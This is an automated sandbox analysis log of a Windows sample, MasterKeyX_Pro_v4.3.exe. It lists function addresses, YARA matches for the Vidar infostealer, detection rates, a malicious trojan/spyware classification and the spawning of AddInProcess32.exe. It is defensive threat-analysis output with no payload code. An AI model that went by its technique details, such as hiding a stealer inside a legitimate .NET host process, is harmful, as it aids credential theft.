Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BC98810 5_2_0BC98810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE50A8 5_2_0BCE50A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE4E00 5_2_0BCE4E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE9D98 5_2_0BCE9D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE2D30 5_2_0BCE2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE7A88 5_2_0BCE7A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE7A78 5_2_0BCE7A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE3048 5_2_0BCE3048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE0040 5_2_0BCE0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE0006 5_2_0BCE0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE001E 5_2_0BCE001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE3038 5_2_0BCE3038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCEB700 5_2_0BCEB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE3700 5_2_0BCE3700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE26C8 5_2_0BCE26C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE26C7 5_2_0BCE26C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE56A0 5_2_0BCE56A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE4DF1 5_2_0BCE4DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE0462 5_2_0BCE0462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCE040B 5_2_0BCE040B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF7BA8 5_2_0BCF7BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF7178 5_2_0BCF7178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCFC8D0 5_2_0BCFC8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF88E0 5_2_0BCF88E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF77C4 5_2_0BCF77C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF5F66 5_2_0BCF5F66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCFEB70 5_2_0BCFEB70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF671A 5_2_0BCF671A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCFB6F0 5_2_0BCFB6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF86A8 5_2_0BCF86A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF86B8 5_2_0BCF86B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF5A60 5_2_0BCF5A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF5A0B 5_2_0BCF5A0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF7A1D 5_2_0BCF7A1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCFD610 5_2_0BCFD610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF6995 5_2_0BCF6995
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCFB990 5_2_0BCFB990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF7153 5_2_0BCF7153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF3538 5_2_0BCF3538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF88D0 5_2_0BCF88D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCF349D 5_2_0BCF349D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BCFE8A8 5_2_0BCFE8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BEDD670 5_2_0BEDD670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BEDE7D0 5_2_0BEDE7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BED8470 5_2_0BED8470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BED8000 5_2_0BED8000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF253F0 5_2_0BF253F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF22BE8 5_2_0BF22BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF253DF 5_2_0BF253DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF22BCA 5_2_0BF22BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF2AF48 5_2_0BF2AF48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF2AF1F 5_2_0BF2AF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF282C0 5_2_0BF282C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF282B0 5_2_0BF282B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF23E40 5_2_0BF23E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF23E34 5_2_0BF23E34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF23E21 5_2_0BF23E21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF229F2 5_2_0BF229F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF2B9E0 5_2_0BF2B9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF2C9C0 5_2_0BF2C9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF299B8 5_2_0BF299B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF29993 5_2_0BF29993
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF21940 5_2_0BF21940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF2994B 5_2_0BF2994B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF22490 5_2_0BF22490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF2248A 5_2_0BF2248A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF20040 5_2_0BF20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF20006 5_2_0BF20006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF37006 5_2_0BF37006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4D578 5_2_0BF4D578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4A178 5_2_0BF4A178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4F3C8 5_2_0BF4F3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4DBB8 5_2_0BF4DBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4B8B8 5_2_0BF4B8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4DBA4 5_2_0BF4DBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4E893 5_2_0BF4E893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4BE9C 5_2_0BF4BE9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4E898 5_2_0BF4E898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4A099 5_2_0BF4A099
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4B88C 5_2_0BF4B88C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4B854 5_2_0BF4B854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF4E833 5_2_0BF4E833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0BF49000 5_2_0BF49000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0C04E3F8 5_2_0C04E3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0C048629 5_2_0C048629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0C048630 5_2_0C048630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0C030006 5_2_0C030006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0C030040 5_2_0C030040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043E8D0 8_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043388C 8_2_0043388C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BA50 8_2_0040BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040CA90 8_2_0040CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00445B30 8_2_00445B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042CBE0 8_2_0042CBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043EC10 8_2_0043EC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00426420 8_2_00426420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041CEE6 8_2_0041CEE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00429F42 8_2_00429F42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00412762 8_2_00412762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040F717 8_2_0040F717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004467E0 8_2_004467E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00425850 8_2_00425850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00419000 8_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043E000 8_2_0043E000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00436010 8_2_00436010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00446010 8_2_00446010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042D020 8_2_0042D020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004450C0 8_2_004450C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004228D0 8_2_004228D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004450D9 8_2_004450D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004450DB 8_2_004450DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004300E0 8_2_004300E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042A8F0 8_2_0042A8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041B0F4 8_2_0041B0F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040D0B0 8_2_0040D0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004048B2 8_2_004048B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004380B0 8_2_004380B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042F0B5 8_2_0042F0B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042D14A 8_2_0042D14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00427150 8_2_00427150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041C955 8_2_0041C955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043395B 8_2_0043395B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00413100 8_2_00413100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041A120 8_2_0041A120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043F9C0 8_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042DA42 8_2_0042DA42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042E240 8_2_0042E240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043DA4B 8_2_0043DA4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042C250 8_2_0042C250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043E260 8_2_0043E260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00435A69 8_2_00435A69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00416200 8_2_00416200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00424230 8_2_00424230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00444A31 8_2_00444A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042AAC2 8_2_0042AAC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042EAC0 8_2_0042EAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00422280 8_2_00422280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043428A 8_2_0043428A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00433AA0 8_2_00433AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004402A0 8_2_004402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00421B50 8_2_00421B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040A360 8_2_0040A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040E360 8_2_0040E360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042E367 8_2_0042E367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00413309 8_2_00413309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00445310 8_2_00445310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00402B30 8_2_00402B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00434BE0 8_2_00434BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004343EF 8_2_004343EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004463F0 8_2_004463F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00408B90 8_2_00408B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00434393 8_2_00434393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041B3A0 8_2_0041B3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004433A1 8_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004363AF 8_2_004363AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004453B0 8_2_004453B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00411BBF 8_2_00411BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041FC4E 8_2_0041FC4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00426C20 8_2_00426C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042A4E0 8_2_0042A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042FE49 8_2_0042FE49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00413CB0 8_2_00413CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043D560 8_2_0043D560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042DD6D 8_2_0042DD6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041A51C 8_2_0041A51C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004105D0 8_2_004105D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00409580 8_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00403590 8_2_00403590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BDA0 8_2_0040BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00439DA0 8_2_00439DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041E5B0 8_2_0041E5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042FE49 8_2_0042FE49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040C660 8_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00407E60 8_2_00407E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00421E70 8_2_00421E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00443634 8_2_00443634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00420EC3 8_2_00420EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043F6C0 8_2_0043F6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004156CB 8_2_004156CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004456E0 8_2_004456E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00433698 8_2_00433698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004226A0 8_2_004226A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042A750 8_2_0042A750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00402760 8_2_00402760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00428764 8_2_00428764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041BF76 8_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043C778 8_2_0043C778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041F700 8_2_0041F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0042BF00 8_2_0042BF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043FF00 8_2_0043FF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00442710 8_2_00442710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00403FD0 8_2_00403FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: String function: 00418FF0 appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: String function: 0040B350 appears 50 times
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAimtars.dll0 vs MasterKeyX_Pro_v4.3.exe
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2610073955.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs MasterKeyX_Pro_v4.3.exe
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAimtars.dll0 vs MasterKeyX_Pro_v4.3.exe
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2611543868.0000000002A90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRP8PV.dll, vs MasterKeyX_Pro_v4.3.exe
Source: 6.2.AddInProcess32.exe.140000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 6.2.AddInProcess32.exe.140000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.MasterKeyX_Pro_v4.3.exe.2d56fa8.3.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/24@11/9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043EC10 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 8_2_0043EC10
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MasterKeyX_Pro_v4.3.exe.log Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Mutant created: NULL
Source: MasterKeyX_Pro_v4.3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MasterKeyX_Pro_v4.3.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MasterKeyX_Pro_v4.3.exe Virustotal: Detection: 61%
Source: MasterKeyX_Pro_v4.3.exe ReversingLabs: Detection: 50%
Source: unknown Process created: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe "C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe"
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
